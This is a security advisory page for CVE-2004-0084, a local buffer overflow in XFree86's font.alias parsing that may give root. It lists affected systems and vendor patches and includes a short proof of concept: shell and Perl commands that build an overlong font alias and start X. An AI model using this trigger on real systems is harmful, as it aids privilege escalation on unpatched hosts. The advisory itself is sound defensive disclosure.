XFree86 CopyISOLatin1Lowered Font_Name Buffer Overflow Vulnerability

BID:9652

Info

XFree86 CopyISOLatin1Lowered Font_Name Buffer Overflow Vulnerability

Bugtraq ID: 9652
Class: Boundary Condition Error
CVE: CVE-2004-0084
Remote: No
Local: Yes
Published: Feb 12 2004 12:00AM
Updated: Jul 12 2009 02:06AM
Credit: Discovery is credited to Greg MacManus.
Vulnerable: XFree86 X11R6 4.3 .0.1
XFree86 X11R6 4.3 .0
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Redhat Fedora Core1
+ Redhat Linux 9.0 i386
+ Slackware Linux 9.1
+ Slackware Linux 9.0
+ Slackware Linux -current
+ Turbolinux Turbolinux Desktop 10.0
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
XFree86 X11R6 4.2.1 Errata
XFree86 X11R6 4.2.1
+ Immunix Immunix OS 7.3
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ Redhat Linux 7.3
+ Slackware Linux 8.1
XFree86 X11R6 4.2 .0
+ Conectiva Linux Enterprise Edition 1.0
+ SuSE Linux 8.0 i386
+ SuSE Linux 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Workstation 8.0
XFree86 X11R6 4.1 .0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Redhat Advanced Workstation for the Itanium Processor 2.1
+ Redhat Enterprise Linux AS 2.1
+ Redhat Enterprise Linux ES 2.1
+ Redhat Enterprise Linux WS 2.1
+ Redhat Linux 7.2 i386
+ Redhat Linux 7.1 i386
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 7.0
XFree86 X11R6 4.1 -12
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
XFree86 X11R6 4.1 -11
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
SGI ProPack 2.4
SGI ProPack 2.3
SCO Unixware 7.1.3
SCO Open UNIX 8.0
OpenBSD OpenBSD 3.4
OpenBSD OpenBSD 3.3
HP HP-UX 11.23
HP HP-UX 11.22
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
Avaya Interactive Response 1.3
Avaya Interactive Response 1.2.1
Avaya Interactive Response
Avaya CMS Server 12.0
Avaya CMS Server 11.0
Avaya CMS Server 9.0
Not Vulnerable: XFree86 X11R6 4.3 .0.2

Discussion

XFree86 CopyISOLatin1Lowered Font_Name Buffer Overflow Vulnerability

It has been reported that the XFree86 X Windows system is prone to a local buffer overflow vulnerability. The issue arises from improper bounds checking when parsing the 'font.alias' file. Successful exploitation of this issue may allow an attacker to gain root privileges to the affected system.

Exploit / POC

XFree86 CopyISOLatin1Lowered Font_Name Buffer Overflow Vulnerability

The following proof of concept has been supplied:

# cat > fonts.dir <<EOF
1
word.bdf -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
EOF
# perl -e 'print "data " . "0" x 2048 . "A" x 96 . "\n"' > fonts.alias
# X :0 -fp $PWD

Solution / Fix

XFree86 CopyISOLatin1Lowered Font_Name Buffer Overflow Vulnerability

Solution:
The XFree86 Project has released a patch dealing with this issue.

SCO has released advisory SCOSA-2004.2 and updates to address this issue. Please see the referenced advisory for further details regarding obtaining and applying appropriate updates.

SGI has released an advisory 20040203-01-U to address this and other issues in SGI ProPack 2.4 and ProPack 2.3. Please see the referenced advisory for more information. Fixes are available below.

Turbolinux have released an advisory (TLSA-2004-5) and fixes to address this issue. Affected users are advised to apply the appropriate updates as soon as possible. Further information regarding obtaining and applying these updates can be found in the referenced advisory.

OpenBSD Project has released fixes to address this issue. Fixes are linked below.

Red Hat has released an advisory (RHSA-2004:060-16) and fixes to address this issue in enterprise products. Customers who are subscribed to the Red Hat Network may run "up2date" to obtain fixes. Further details pertaining to obtaining and applying appropriate fixes can be found in the referenced advisory.

Red Hat has released a Fedora advisory (FEDORA-2004-069) and fixes to address this issue. Users who are running Fedora may run "up2date" to obtain fixes. Further details pertaining to obtaining and applying appropriate fixes can be found in the referenced advisory.

Mandrake has released an advisory (MDKSA-2004:012) and fixes to address this issue. Further details pertaining to obtaining and applying appropriate fixes can be found in the referenced advisory.

Immunix have released an advisory (IMNX-2004-73-002-01) and fixes to address this issue. Customers who are running Immunix 7.3 may run "up2date -u", to obtain fixes. Further details pertaining to obtaining and applying appropriate fixes can be found in the referenced advisory.

Slackware have released an advisory (SSA:2004-043-02) and fixes to address this issue. Please see referenced advisory for further details regarding the application of relevant fixes.

RedHat has released an advisory (RHSA-2004:059-01) and fixes to address this issue. See the referenced advisory for links to fixed packages.

Debian has released an advisory (DSA 443-1) and fixes to address this issue. See the referenced advisory for fix information.

Conectiva advisory CLA-2004:821 has bee released dealing with this issue. Please see the reference section for more information.

SuSE has released advisory SuSE-SA:2004:006 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

HP has released an advisory (HPSBUX01018) with fixes to address this issue. The advisory can be obtained from the following location, however, IT resource center authentication credentials are required:

http://your.hp.com/m/S.asp?HB13370677735X3451007X362981

The XFree86 Project has released version 4.3.0.2 to address this issue. This version is available from CVS, or via patches from version 4.3.0 to 4.3.0.1, and then from 4.3.0.1 to 4.3.0.2.

Fedora Legacy has released advisory FLSA-2005:2314 dealing with this and other issues for the Fedora Core 1 and RedHat Linux packages. Please see the referenced advisory for more information.

Sun has released Sun Alert ID: 57768 dealing with this and other issues. Please see the referenced advisory for more details. Please note that the Solaris 8 patch is not yet available.

Avaya has released advisory ASA-2005-113 and fixes to address this issue. Please see the referenced advisory for additional details.


Sun Solaris 7.0

Sun Solaris 9

OpenBSD OpenBSD 3.3

Sun Solaris 7.0_x86

Sun Solaris 9_x86

OpenBSD OpenBSD 3.4

HP HP-UX 11.0
  • HP PHSS_30181
    Patch is available from: HP-UX Security Patch Matrix

  • HP PHSS_30477
    Patch is available from: HP-UX Security Patch Matrix


HP HP-UX 11.0 4
  • HP PHSS_30586
    Patch is available from: HP-UX Security Patch Matrix

  • HP PHSS_30706
    Patch is available from: HP-UX Security Patch Matrix


HP HP-UX 11.11
  • HP PHSS_30173
    Patch is available from: HP-UX Security Patch Matrix

  • HP PHSS_30478
    Patch is available from: HP-UX Security Patch Matrix


HP HP-UX 11.22
  • HP PHSS_30172
    Patch is available from: HP-UX Security Patch Matrix

  • HP PHSS_30479
    Patch is available from: HP-UX Security Patch Matrix


HP HP-UX 11.23
  • HP PHSS_30171
    Patch is available from: HP-UX Security Patch Matrix

  • HP PHSS_30480
    Patch is available from: HP-UX Security Patch Matrix


SGI ProPack 2.3

SGI ProPack 2.4

XFree86 X11R6 4.1 .0

XFree86 X11R6 4.2 .0

XFree86 X11R6 4.2.1

XFree86 X11R6 4.3 .0

References

© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report